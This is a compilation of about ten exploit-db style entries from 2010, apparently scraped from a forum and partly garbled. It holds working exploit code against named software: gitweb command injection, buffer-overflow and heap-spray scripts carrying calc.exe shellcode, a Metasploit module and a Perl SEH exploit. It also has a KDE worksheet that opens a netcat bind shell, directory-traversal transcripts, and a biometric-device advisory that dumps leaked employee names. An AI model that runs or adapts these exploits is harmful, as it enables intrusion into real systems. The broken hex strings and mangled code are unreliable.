# cve: Cve-2008-5516 - cve-2008-5517



# code:



# the cgi script doesn't show the command output *blind command execution ;)*

# vulnerable functions in git************.cgi: Git_snapshot(), git_search(), git_object()





sub git_object {

# object is defined by:

# - hash or hash_base alone

# - hash_base and file_name

my $type;



# - hash or hash_base alone

if ($hash || ($hash_base && !defined $file_name)) {

my $object_id = $hash || $hash_base;



my $git_command = git_cmd_str();

open my $fd, "-|", "$git_command cat-file -t $object_id 2>/dev/null"

or die_error('404 not found', "object does not exist");

$type = <$fd>;

chomp $type;

close $fd

or die_error('404 not found', "object does not exist");



# - hash_base and file_name



# example

http://server/cgi-bin/git************.cgi?p=sample.git/.git;a=object;f=program.c;h=e69de29bb2d1d6434b8b29 ae775ad8c2e48c5391|`touch$ifs/tmp/file.txt`|;hb=9adaf5b35bb6415497d23f089660567227ea 3785

# title: Wireshark 1.2.5 lwres getaddrbyname bof - calc.exe
# edb-id: 11453
# cve-id: ()
# osvdb-id: ()
# author: Nullthreat and pure|hate
# published: 2010-02-15
# verified: Yes
# download exploit code
# download n/a

view sourceprint?#!/usr/bin/env python

# wireshark 1.2.5 lwres getaddrbyname stack-based buffer overflow

# discovered by babi

# reference: http://www.exploit-db.com/exploits/11288

# exploit dev by nullthreat & pure|hate



import socket, sys



try:

Host = sys.argv[1]

except:

Print "usage: " + sys.argv[0] + " <host>"

exit(2)



port = 921

addr = (host, port)



leng = 9150

high = int(leng / 256)

low = leng & 255



crash = ("a" * 2128)



# short jump

jmp = "\x90\x90\x06\xeb"



# pop/pop/ret in pcre3 0x61b4121b

ppr = "\x1b\x12\xb4\x61"



nop = ("\x90" * 24)



# 224 bytes = calc.exe

****************lcode = (

"\xbf\x86\x0a\x33\xa0\x2b\xc9\xda\xd9\xd9\x74\x24\ xf4\xb1"

"\x32\x5e\x31\x7e\x11\x03\x7e\x11\x83\xc6\x82\xe8\ xc6\x5c"

"\x62\x65\x28\x9d\x72\x16\xa0\x78\x43\x04\xd6\x09\ xf1\x98"

"\x9c\x5c\xf9\x53\xf0\x74\x8a\x16\xdd\x7b\x3b\x9c\ x3b\xb5"

"\xbc\x10\x84\x19\x7e\x32\x78\x60\x52\x94\x41\xab\ xa7\xd5"

"\x86\xd6\x47\x87\x5f\x9c\xf5\x38\xeb\xe0\xc5\x39\ x3b\x6f"

"\x75\x42\x3e\xb0\x01\xf8\x41\xe1\xb9\x77\x09\x19\ xb2\xd0"

"\xaa\x18\x17\x03\x96\x53\x1c\xf0\x6c\x62\xf4\xc8\ x8d\x54"

"\x38\x86\xb3\x58\xb5\xd6\xf4\x5f\x25\xad\x0e\x9c\ xd8\xb6"

"\xd4\xde\x06\x32\xc9\x79\xcd\xe4\x29\x7b\x02\x72\ xb9\x77"

"\xef\xf0\xe5\x9b\xee\xd5\x9d\xa0\x7b\xd8\x71\x21\ x3f\xff"

"\x55\x69\xe4\x9e\xcc\xd7\x4b\x9e\x0f\xbf\x34\x3a\ x5b\x52"

"\x21\x3c\x06\x39\xb4\xcc\x3c\x04\xb6\xce\x3e\x27\ xde\xff"

"\xb5\xa8\x99\xff\x1f\x8d\x55\x4a\x3d\xa4\xfd\x13\ xd7\xf4"

"\x60\xa4\x0d\x3a\x9c\x27\xa4\xc3\x5b\x37\xcd\xc6\ x20\xff"

"\x3d\xbb\x39\x6a\x42\x68\x3a\xbf\x21\xef\xa8\x23\ xa6\xe5"

)



crash2 = ("\xcc" * 6752)



data = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\ x00\x01\x00\x01"

data += "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\ x00\x00\x00\x00"

data += "\x00\x00\x00\x01"

data += chr(high) + chr(low) + crash + jmp + ppr + nop + ****************lcode + crash2 + "\x00\x00"



udps = socket.socket(socket.af_inet, socket.sock_dgram)

try:

Udps.sendto(data, addr)

except:

Print "can't lookup host"

exit(1)



udps.close()

exit(0)


# title: Argosoft ftp server .net v.1.0.2.1 directory traversal vulnerability
# edb-id: 11765
# cve-id: ()
# osvdb-id: ()
# author: Dmnt
# published: 2010-03-15
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# exploit title: Argosoft ftp server .net v.1.0.2.1 directory traversal

# date: 16.03.2010

# author: Dmnt

# software link: http://www.argosoft.com/files/apps/ftpserversetup.msi

# version: Argosoft ftp server .net v.1.0.2.1

# tested on: Windows 7

# code :

Cwd ...

250 requested file action ok, completed

xpwd

257 "/.../" is working directory

cwd ...

250 requested file action ok, completed

xpwd

257 "/.../.../" is working directory


# title: Liquid xml studio 2010 <= v8.061970 - (ltxmlcomhelp8.dll) openfile() remote 0day overflow exploit
# edb-id: 11750
# cve-id: ()
# osvdb-id: ()
# author: Mr_me
# published: 2010-03-15
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?<html>

<!--

|------------------------------------------------------------------|

| __ __ |

| _________ ________ / /___ _____ / /____ ____ _____ ___ |

| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |

| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |

| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |

| |

| http://www.corelan.be:8800 |

| security@corelan.be |

| |

|-------------------------------------------------[ eip hunters ]--|



# liquid xml studio 2010 <= v8.061970 - (ltxmlcomhelp8.dll) openfile() remote 0day heap overflow exploit

# found by: Steven seeley (mr_me) http://net-ninja.net/

# homepage: http://www.liquid-technologies.com/

# download: http://www.liquid-technologies.com/download.aspx

# tested on: Windows xp sp3 (ie 6 & 7)

# greetz: Corelan security team

# http://www.corelan.be:8800/index.php...-team-members/

# reference: http://www.exploit-db.com/exploits/7402

# thanks to e.wizz! & shinnai for the reliable js code

# ################################################## ################################################## ##

# script provided 'as is', without any warranty.

# use for educational purposes only.

# do not use this code to do anything illegal !

#

# note : You are not allowed to edit/modify this code.

# if you do, corelan cannot be held responsible for any damages this may cause.



! Marked safe for scripting !



~~~~~~~ liquid xml customers ~~~~~~~

http://www.liquid-technologies.com/customers.aspx



liquid xml studio is being used by thousands of organisations around the globe including many ftse

100 and fortune 100 companies, as part of their business critical projects.



- australian dod

- us dod

- federal department of foreign affairs

- nsa

- us army material command

- bank of america

- american express

- hsbc bank

- merrill lynch

- microsoft corporation

- cisco systems

- etc



enough said.

-->

<object classid='clsid:e68e401c-7db0-4f3a-88e1-159882468a79' id='boom' ></object>

<script language="javascript" defer>



//calc.exe

var scode = unescape("%ue860%u0000%u0000%u815d%u06ed%u0000%u8a 00%u1285%u0001%u0800" +

"%u75c0%ufe0f%u1285%u0001%ue800%u001a%u0000%uc009% u1074%u0a6a" +

"%u858d%u0114%u0000%uff50%u0695%u0001%u6100%uc031% uc489%uc350" +

"%u8d60%u02bd%u0001%u3100%ub0c0%u6430%u008b%u408b% u8b0c%u1c40" +

"%u008b%u408b%ufc08%uc689%u3f83%u7400%uff0f%u5637% u33e8%u0000" +

"%u0900%u74c0%uab2b%ueceb%uc783%u8304%u003f%u1774% uf889%u5040" +

"%u95ff%u0102%u0000%uc009%u1274%uc689%ub60f%u0107% uebc7%u31cd" +

"%u40c0%u4489%u1c24%uc361%uc031%uf6eb%u8b60%u2444% u0324%u3c40" +

"%u408d%u8d18%u6040%u388b%uff09%u5274%u7c03%u2424% u4f8b%u8b18" +

"%u205f%u5c03%u2424%u49fc%u407c%u348b%u038b%u2474% u3124%u99c0" +

"%u08ac%u74c0%uc107%u07c2%uc201%uf4eb%u543b%u2824% ue175%u578b" +

"%u0324%u2454%u0f24%u04b7%uc14a%u02e0%u578b%u031c% u2454%u8b24" +

"%u1004%u4403%u2424%u4489%u1c24%uc261%u0008%uc031% uf4eb%uffc9" +

"%u10df%u9231%ue8bf%u0000%u0000%u0000%u0000%u9000% u6163%u636c" +

"%u652e%u6578%u9000");

var sslide = unescape("%u9090%u9090");

var heapsa = 0x0c0c0c0c;

function tryme()

{

var buffsize = 10000;

var x = unescape("%0a%0a%0a%0a");

while (x.length<buffsize) x += x;

x = x.substring(0,buffsize);

boom.openfile(x, 1);

}

function getsslide(sslide, sslidesize)

{

while (sslide.length*2<sslidesize)

{

sslide += sslide;

}

sslide = sslide.substring(0,sslidesize/2);

return (sslide);

}

var heapbs = 0x400000;

var sizehdm = 0x5;

var plsize = (scode.length * 2);

var sslidesize = heapbs - (plsize + sizehdm);

var heapblocks = (heapsa+heapbs)/heapbs;

var memory = new array();

sslide = getsslide(sslide,sslidesize);

for (i=0;i<heapblocks;i++)

{

memory[i] = sslide + scode;

}

</script>

<body onload="javascript: Return tryme();">

<p><center>~ mr_me presents ~</p>

<p><b>liquid xml studio 2010 <= v8.061970 - (ltxmlcomhelp8.dll) openfile() remote 0day heap overflow exploit</b></center></p>

</body>

</html>

# title: Open & compact ftpd 1.2 pre-authentication buffer overflow (****************)
# edb-id: 11742
# cve-id: ()
# osvdb-id: ()
# author: Blake
# published: 2010-03-15
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# exploit title: Open & compact ftpd 1.2 pre-authentication buffer overflow msf

# date: March 14, 2010

# author: Blake

# version: 1.2

# tested on: Xp sp3



exploit causes the ftp server to crash so adduser, etc. Payloads are most effective.







Require 'msf/core'





class ****************sploit3 < msf::exploit::remote

rank = averageranking



include msf::exploit::remote::ftp



def initialize(info = {})

super(update_info(info,

'name' => 'open & compact ftpd 1.2 pre-authentication buffer overflow',

'description' => %q{

this module exploits a stack overflow in the user verb in open & compact ftpd version 1.2. The program will crash once the payload is sent, so bind ****************l payloads are not effective.



},

'author' => 'blake',

'license' => msf_license,

'version' => 'version 1',

'references' =>

[

[ 'edb-id', '11420'],

[ 'url', 'http://www.exploit-db.com/exploits/11420' ],

],

'privileged' => true,

'defaultoptions' =>

{

'exitfunc' => 'process',

},

'payload' =>

{

'space' => 400,

'badchars' => "\x00\x20\x0a\x0d",

'stackadjustment' => -3500,

},

'platform' => 'win',

'targets' =>

[

[ 'windows xp sp2/sp3 english', { 'ret' => 0x00202c42 } ],



],

'disclosuredate' => 'feb 12, 2010',

'defaulttarget' => 0))

end





def exploit

connect



sploit = "\x42\x2c\x20" * 199

sploit << make_nops(10)

sploit << payload.encoded



print_status("trying target {target.name<http://target.name>}...")



login = "user + sploit + \r\n"

login << "pass " + rand_text_alphanumeric(12)



sock.put(login + "\r\n")



handler

disconnect

end



end


# title: Zksoftware biometric attendence managnmnet hardware[mips] improper authentication
# edb-id: 11822
# cve-id: ()
# osvdb-id: ()
# author: Fb1h2s
# published: 2010-03-20
# verified: No
# download exploit code
# download n/a

view sourceprint?# exploit title: Zksoftware biometric attendence managnmnet hardware[mips] improper authentication.

# date: 20-3-2010

# author: Fb1h2s

# software link: http://www.esslindia.com/install/etimetrack.zip

# version: V2

# tested on:

# category: Remote

# code : Advisory



################################################## #################################

zksoftware biometric attendence management hardware[mips] improper authentication.



1) zksoftware is biometric system which uses biometric (fingerprints) to authenticate and manage employee details,and to organise the attendance register.

This system is widely used in many countries, but is marketed by different company depending on the country.



Zksoftwares ip-based attendance management system with the following series "zk5000-zk9000", the system allows remote ip based management of the hardware via udp protocol,

but with out any proper authentication.



You could custom create commands and send to udp port 4370 of the hardwrae and download information from the system, alternatively u could download a copy of there

remote hardware management software from one of there vendors ************ site and use it steel data from the hardware.



Essl is the company which markets this product in india, and its ************site provides a free download of the management software.



2) etimetrack software which is used to manage hardware market by essl uses an encryption and the encryption key is hard coded in the program.



Exploiting the issue using scapy





response from a coustom made scapy packets:-

################################################## ################################################## #

fb1h2s@fb1h2s:~$ sudo scapy

[sudo] password for adminuser:

/var/lib/python-support/python2.5/scapy.py:3118: Warning: 'with' will become a reserved keyword in python 2.6

/var/lib/python-support/python2.5/scapy.py:3120: Warning: 'with' will become a reserved keyword in python 2.6

info: Can't import pyx. Won't be able to use psdump() or pdfdump()

welcome to scapy (v1.1.1 / -)

>>>ip=ip("192.168.*.*)

>>>udp=udp(sport=4371,dport=4370)

>>>payload="coustomcommands"

>>packet=ip/udp/payload

>>> sniff

<function sniff at 0x9f0333c>

>>sr1(packet)

begin emission:

Finished to send 1 packets.

You could possibly get any thing you want from the system

bingo :d



i am including a dump of the udp communication with the hardware, and the data leakage as a reason of improper authentication.



...........q[...l.wu[.....f.[...ver 6.21 sep 4 2008.....[...~os.....[...~os=1...hv[...~extendfmt...f>[...~extendfmt=0...jw[...extendoplog.....[...extendoplog=...x.[...~platform.....[...~platform=zem500.e..y[...h....q[...... .[...workcode....r[...workcode=0....e[.................f[..............3....d[..............@[.............u.........d......

Mmr.k.sug........d...e......mmr. Sant.)......e...f......mmrs. Anu/@......f...g......mmr. kris@@......g...h......mmr. Domian......h...i......mmrs. Sho`n......i...j......mmr. B. S~)......j...k......mms. Bhag_n......k...l......mms. Nishyn......l...m......mmr. Moha.)......m...n......

Mmr. Chanxn......n...o......mmrs. Ruk^n......o...p......mmr. Prad.g......p...q......mmr. Kuma\n......q...r......mmr. Dhan[n......r...s......mmr. Nirmzn......s...t......mms. lali1@......t...u......mms. Nave.)......u...v......mms. Sudh.)......v...w......

Mms. anit2@......w...x......mms. poon3@......x...y......mmrs. Gee=@......y...z......mms. Vidh<@......z...{......mmrs. banb@......{...|......mmrs. Man]n......|...}......mmr.g.thiwn......}...~......mms. Indi........~..........mmrs. Jot...................mmrs. Kav...................

Mmr. Thiy...................mmr. Prak.8.................mms. Love.8.................mmr. Sund.8.................mmr. Kart.8.................mms. Koma.8.................mmr. Prad.8.................mmr. ........maheb`.................mmr. Rajkc`.................mmr. Natad`.................mmr. Manoe`.................mmr. Varu<`.................

Mmr. than@`.................mmr. Rich=`.................mmr. Prak>`.................mmrs.a.us?`................ .mmrs.b.kaa`.................mms. Banu._.................mmr. Stal.@.................mmr. Chan.@.................mmr. Dhanqn.................mmr. Mukirn.................mmrs. Satcn.................mms. Gomabn.................mmr. Ramadn.................

Mmrs. Geeen.................

Trimmed....



Current vulnerability is checked and verified with zk5000 hardware model, possibly all other versions would be vulnerable.



################################################## ################################################## #

# greetz to all darkc0de, andhra hackers and icw memebers[indian cyber wrriors]

#thanks : Mr bond,beenu,wipu,godwinaustin,the_empty,hg_h@x0r,r4 5c4l,it_security,eberly,harin,manoj

#shoutz : Smart_hax0r,j4ckh4x0r,41w@r10r,hackuin

#catch us at www.andhrahackers.com or www.teamicw.in

# title: Edisplay personal ftp server 1.0.0 multiple post-authentication stack bof
# edb-id: 11820
# cve-id: ()
# osvdb-id: ()
# author: Corelanc0d3r
# published: 2010-03-20
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# exploit title : Edisplay personal ftp server 1.0.0 multiple post-authentication stack bof

# type of sploit: Remote code execution

# bug found by : Loneferret (march 19, 2010)

# reference : http://www.exploit-db.com/exploits/11810

# exploit date : March 20, 2010

# author : Corelanc0d3r

# version : 1.0.0

# os : Windows

# tested on : Xp sp3 en (virtualbox)

# type of vuln : Seh

# greetz to : Loneferret, dookie2000ca and of course my friends at corelan security team

# http://www.corelan.be:8800/index.php...-team-members/

# ----------------------------------------------------------------------------------------------------

# script provided 'as is', without any warranty.

# use for educational purposes only.

# do not use this code to do anything illegal !

#

# note : You are not allowed to edit/modify this code.

# if you do, corelan cannot be held responsible for any damages this may cause.

#

# ----------------------------------------------------------------------------------------------------

#

# before we begin : If you liked my quickzip.exe exploit

# then you will certainly love this one too :-)

#

# ----------------------------------------------------------------------------------------------------

#

#

# code :

Print "|------------------------------------------------------------------|\n";

print "| __ __ |\n";

print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";

print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";

print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";

print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";

print "| |\n";

print "| http://www.corelan.be:8800 |\n";

print "| |\n";

print "|-------------------------------------------------[ eip hunters ]--|\n\n";

print " --==[ exploit for edisplay personal ftp server 1.0.0]==-- \n";

print " author : Corelanc0d3r\n\n";





use io::socket;

if ($#argv ne 3) {

print " usage: $0 <targetip> <targetport> <user> <password>\n";

exit(0);

}



my $user=$argv[2];

my $pass=$argv[3];



print " [+] preparing payload\n";

#basereg edi - custom messagebox payload

my $sc = "w00tw00t".

"wyiiiiiiiiiiiiiiii7qzjaxp0a0akaaq2ab2bb0bbabx ".

"p8abujin98kmkn9qdetjttqzrnrcjuaxi54lkbqfplkpv ".

"vlnkqfgllkw6thlkqngplkp6fxpotxd5zsryeq8qko8aa ".

"plkplututnkw5wllksduuchs1yznk3zvxlk1j5pwqxkzc ".

"p7qylkp4nkfa8ndqkouaypklnlndkppt4jjaxotmfajgi ".

"yxqkokoko7kslwt6hpuinnkcjgtuqzkbflk6lpknkcj7l ".

"fajklkvdlkc1kxk9qtetulsqksnrthwyxtk9kuoykrcxl ".

"npnfnxl62kxolkoio9ok9reutmk3nihkr3cowulutprjh ".

"lkkokoiooyw5wxcxrlblq0koqxfswbvnctu8qet3cut2m ".

"xclvd6joyivqfkosevdoyyrrpokoxlbpmmlow5lddrrjh ".

"qnko9o9ophtn6nfnv8phdp0decsbu8blcqrncsqxpcror ".

"rsutqkkmx1ltdtoniysrhtnvnqhup3xq0gk4i6n3xbgsq ".

"1ypnphsysduppaqxstqycteptqximxpltdfrmykqp1zrs ".

"b3cpqrrkon0dqipbpkoqeexa";



#custom encoded egg hunter

#boy i love pvefindaddr !

# !pvefindaddr encode ascii <bytes>

#i only had to fix bad chars

#but we need 5c to trigger seh at correct offset

my $decoder=

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x2e\x5d\x55\x5d".

"\x2d\x2d\x5d\x55\x5d".

"\x2d\x30\x5e\x55\x5d".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x70\x2d\x5c\x6f". #we need these 5c's !!

"\x2d\x70\x2c\x5c\x6f". #we need these 5c's !!

"\x2d\x71\x30\x5d\x71".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x45\x2e\x23\x56".

"\x2d\x45\x2d\x23\x56".

"\x2d\x46\x30\x2e\x59".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x5b\x6c\x2d\x45".

"\x2d\x5b\x6c\x2d\x45".

"\x2d\x5b\x6e\x2d\x45".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x41\x53\x37\x2e".

"\x2d\x41\x53\x37\x2d".

"\x2d\x42\x54\x37\x30".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x54\x37\x66\x45".

"\x2d\x54\x37\x66\x45".

"\x2d\x56\x39\x66\x46".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x50\x3f\x39\x31".

"\x2d\x50\x3f\x39\x31".

"\x2d\x51\x3f\x3b\x33".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x33\x2a\x67\x55".

"\x2d\x33\x2a\x67\x55".

"\x2d\x34\x2a\x67\x55".

"\x50".

"\x75\x58"; #jump to decoded opcode





my $buffer = "a" x 45;

my $pad=("d" x 30);

my $nseh= "\x61\x42\x42\x42";

my $seh=pack('v',0x202d2b3c); #comctl32.ocx 0x202d2b3c

#encoded jumpback code to jump to encoded egg hunter

#pfew that's a mouthful

my $jumpback="\x50\x5c";

$jumpback=$jumpback."\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x55\x55\x55\x5e".

"\x2d\x55\x55\x55\x5e".

"\x2d\x56\x55\x56\x60".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x2a\x5c\x59\x54".

"\x2d\x2a\x5c\x59\x54".

"\x2d\x2b\x5d\x59\x56".

"\x50";

my $rest = "a" x (1000 - length($buffer.$nseh.$seh.$decoder.$pad.$sc.$jumpb ack)-20-5);

#align eax first

my $aligneax="\x52\x58\x2d\x35\x55\x55\x55\x2d\x35\x5 5\x55\x55\x2d\x35\x55\x55\x55";

my $payload=$buffer."cccccccccccccccccc".$decoder.$pa d.$nseh.$seh."bbb".$aligneax.$jumpback.$rest.$sc;



print " [+] connecting to server $argv[0] on port $argv[1]\n";

$sock = io::socket::inet->new(peeraddr => $argv[0],

peerport => $argv[1],

proto => 'tcp');



$ftp = <$sock> || die " [!] *** unable to connect ***\n";

print " ** $ftp";

print " [+] logging in (user $user)\n";

print $sock "user $user\r\n";

$ftp = <$sock>;

print " ** $ftp";

print $sock "pass $pass\r\n";

$ftp = <$sock>;

print " ** $ftp";

print " [+] sending payload (" . Length($payload)." bytes)\n";

print $sock "rmd ".$payload."\r\r\n";

print $sock "quit\r\n";



print " [+] ****************lcode size : " . Length($sc)." bytes\n";



# title: Kde <= 4.4.1 ksysguard rce via cross application scripting
# edb-id: 11817
# cve-id: ()
# osvdb-id: ()
# author: Emgent
# published: 2010-03-20
# verified: Yes
# download exploit code
# download n/a

view sourceprint?# exploit title: Ksysguard rce via cross application scripting

# date: 2010 03 20

# author: Emanuele 'emgent' gentili

# code: http://www.backtrack.it/~emgent/expl...rd_rce_cas.txt

# version: <= 4.4.1

# cve : N/a

# vendor: http://www.kde.org

# video: http://www.backtrack.it/~emgent/vide...owning_kde.mov

# about cas: http://en.wikipedia.org/wiki/cross_a...tion_scripting

# http://it.wikipedia.org/wiki/cross_a...tion_scripting







halfapple:~ emanuelegentili$ cat ph33r.sgrd

<?xml version="1.0" encoding="utf-8"?>

<!doctype ksysguardworksheet>

<worksheet title="she" interval="2" locked="0" rows="2" columns="2" >

<host command="nc -l -p31337 -e /bin/bash" /> </worksheet>

halfapple:~ emanuelegentili$


# title: Mx simulator server remote buffer overflow poc
# edb-id: 11857
# cve-id: ()
# osvdb-id: ()
# author: Salvatore fresta
# published: 2010-03-23
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?/*



mx simulator server 2010-02-06 remote buffer overflow poc



this poc will executes the calc.exe software on the remote

system.

The bug was discovered by luigi auriemma (www.aluigi.org)



copyright 2010 salvatore fresta aka drosophila

http://www.salvatorefresta.net/?opt=adv

http://www.salvatorefresta.net/files...2010-02-06.zip



this program is free software; you can redistribute it and/or

modify it under the terms of the gnu general public license

as published by the free software foundation; either version

2 of the license, or (at your option) any later version.



This program is distributed in the hope that it will be

useful, but without any warranty; without even the implied

warranty of merchantability or fitness for a particular

purpose. See the gnu general public license for more details.



You should have received a copy of the gnu general public

license along with this program; if not, write to the free

software foundation,inc., 59 temple place, suite 330, boston,

ma 02111-1307 usa



http://www.gnu.org/licenses/gpl-2.0.txt



*/



#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <time.h>



#ifdef win32

#include <winsock.h>

#include "winerr.h"



#define close closesocket

#else

#include <unistd.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <arpa/inet.h>

#include <netinet/in.h>

#include <netdb.h>

#endif



#define buffsz 1024

#define port 19800



/*

* windows/exec - 511 bytes

* http://www.****************sploit.com

* encoder: X86/alpha_mixed

* exitfunc=process, cmd=calc.exe

*/

#define ****************lcode \

"\xb8\x9e\xef\xf3\x90\x31\xc9\xb1\x33\xd9\xc2\xd9\ x74\x24\xf4" \

"\x5b\x31\x43\x0e\x83\xc3\x04\x03\xdd\xe5\x11\x65\ x1d\x11\x5c" \

"\x86\xdd\xe2\x3f\x0e\x38\xd3\x6d\x74\x49\x46\xa2\ xfe\x1f\x6b" \

"\x49\x52\x8b\xf8\x3f\x7b\xbc\x49\xf5\x5d\xf3\x4a\ x3b\x62\x5f" \

"\x88\x5d\x1e\x9d\xdd\xbd\x1f\x6e\x10\xbf\x58\x92\ xdb\xed\x31" \

"\xd9\x4e\x02\x35\x9f\x52\x23\x99\x94\xeb\x5b\x9c\ x6a\x9f\xd1" \

"\x9f\xba\x30\x6d\xd7\x22\x3a\x29\xc8\x53\xef\x29\ x34\x1a\x84" \

"\x9a\xce\x9d\x4c\xd3\x2f\xac\xb0\xb8\x11\x01\x3d\ xc0\x56\xa5" \

"\xde\xb7\xac\xd6\x63\xc0\x76\xa5\xbf\x45\x6b\x0d\ x4b\xfd\x4f" \

"\xac\x98\x98\x04\xa2\x55\xee\x43\xa6\x68\x23\xf8\ xd2\xe1\xc2" \

"\x2f\x53\xb1\xe0\xeb\x38\x61\x88\xaa\xe4\xc4\xb5\ xad\x40\xb8" \

"\x13\xa5\x62\xad\x22\xe4\xe8\x30\xa6\x92\x55\x32\ xb8\x9c\xf5" \

"\x5b\x89\x17\x9a\x1c\x16\xf2\xdf\xd3\x5c\x5f\x49\ x7c\x39\x35" \

"\xc8\xe1\xba\xe3\x0e\x1c\x39\x06\xee\xdb\x21\x63\ xeb\xa0\xe5" \

"\x9f\x81\xb9\x83\x9f\x36\xb9\x81\xc3\xd9\x29\x49\ x2a\x7c\xca" \

"\xe8\x32"



int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err);

int timeout(int sock, int secs);

unsigned int resolv(char *host);

void std_err(void);







int main(int argc, char *argv[]) {



struct sockaddr_in peer;

int sd,

len;

unsigned short port = port;

unsigned char buff[buffsz],

*host = null,

pkg[] =

"\x03"

"\x00\x00\x00\x00" // slot

"\x00\x00\x00\x00" // session id

"\x00\x00\x00\x00" // admin pwd crc

"\x00\x00\x00\x00" // uid

"000000000000000000000000" // ???

"yz250f||||\n" // bike's model

"999\n" // bike's number

"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa"

"\xd8\x69\x83\x7c" // eip - call esp (ffd4)

****************lcode;



#ifdef win32

wsadata wsadata;

wsastartup(makeword(1,0), &wsadata);

#endif



if(argc < 2) {

printf("\nmx simulator server 2010-02-06 remote buffer overflow poc - salvatore fresta\n"

"http://www.salvatorefresta.net\n"

"\n"

"usage: %s <target host> <port> (default: %hu)\n"

"\n", argv[0], port);

return -1;

}



host = argv[1];

if(argc > 2) port = atoi(argv[2]);



peer.sin_addr.s_addr = resolv(host);

peer.sin_port = htons(port);

peer.sin_family = af_inet;



printf("\n[*] socket opening in progress...");



sd = socket(af_inet, sock_dgram, ipproto_udp);

if(sd < 0) {

printf("\n[-] unable to open a socket!\n\n");

std_err();

}



printf("\n[+] socket open successfully"

"\n[*] data sending in progress...");



memset(buff, 0, 9);

len = send_recv(sd, buff, 9, buff, buffsz, &peer, 1);



*(int *)(pkg + 1) = *(int *)(buff + 1);

*(int *)(pkg + 5) = *(int *)(buff + 5);

len = send_recv(sd, pkg, sizeof(pkg) - 1, buff, buffsz, &peer, 0);



printf("\n[+] data sent successfully"

"\n[+] connection closed\n\n");



close(sd);



return 0;



}







int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err) {



int retry,

len;



if(in && !out) {

fputc('.', stdout);

if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))

< 0) std_err();

return(0);

}



if(in) {

for(retry = 2; retry; retry--) {

fputc('.', stdout);

if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))

< 0) std_err();

if(!timeout(sd, 1)) break;

}



if(!retry) {

if(!err) return(-1);

printf("\nerror: Socket timeout, no reply received\n\n");

exit(1);

}

} else {

if(timeout(sd, 3) < 0) return(-1);

}



fputc('.', stdout);

len = recvfrom(sd, out, outsz, 0, null, null);

if(len < 0 && err) std_err();



return len;



}







int timeout(int sock, int secs) {



struct timeval tout;

fd_set fd_read;

int err;



tout.tv_sec = secs;

tout.tv_usec = 0;

fd_zero(&fd_read);

fd_set(sock, &fd_read);

err = select(sock + 1, &fd_read, null, null, &tout);

if(err < 0) std_err();

if(!err) return(-1);



return 0;



}







unsigned int resolv(char *host) {



struct hostent *hp = null;

unsigned int host_ip;



host_ip = inet_addr(host);

if(host_ip == inaddr_none) {

hp = gethostbyname(host);

if(!hp) {

printf("\nerror: Unable to resolv hostname (%s)\n", host);

exit(1);

} else host_ip = *(unsigned int *)hp->h_addr;

}



return host_ip;



}







#ifndef win32

void std_err(void) {

perror("\nerror");

exit(1);

}

#endif


# title: Uhttp server path traversal vulnerability
# edb-id: 11856
# cve-id: ()
# osvdb-id: ()
# author: Salvatore fresta
# published: 2010-03-23
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?uhttp server path traversal vulnerability



name uhttp server

vendor http://uhttps.sourceforge.net

versions affected 0.1.0-alpha



author salvatore fresta aka drosophila

************site http://www.salvatorefresta.net

contact salvatorefresta [at] gmail [dot] com

date 2010-03-10



x. Index



i. About the application

ii. Description

iii. Analysis

iv. Sample code

v. Fix

vi. Disclosure timeline





i. About the application



an ultra lightweight ************server with a very small memory

usage.





Ii. Description



bad chars are not properly sanitised.





Iii. Analysis



summary:



A) path traversal



a) path traversal



the problem is in the management of the bad chars that can

be used to launch some attacks, such as the directory

traversal.

The path traversal sequence ('../') is not checked, so it
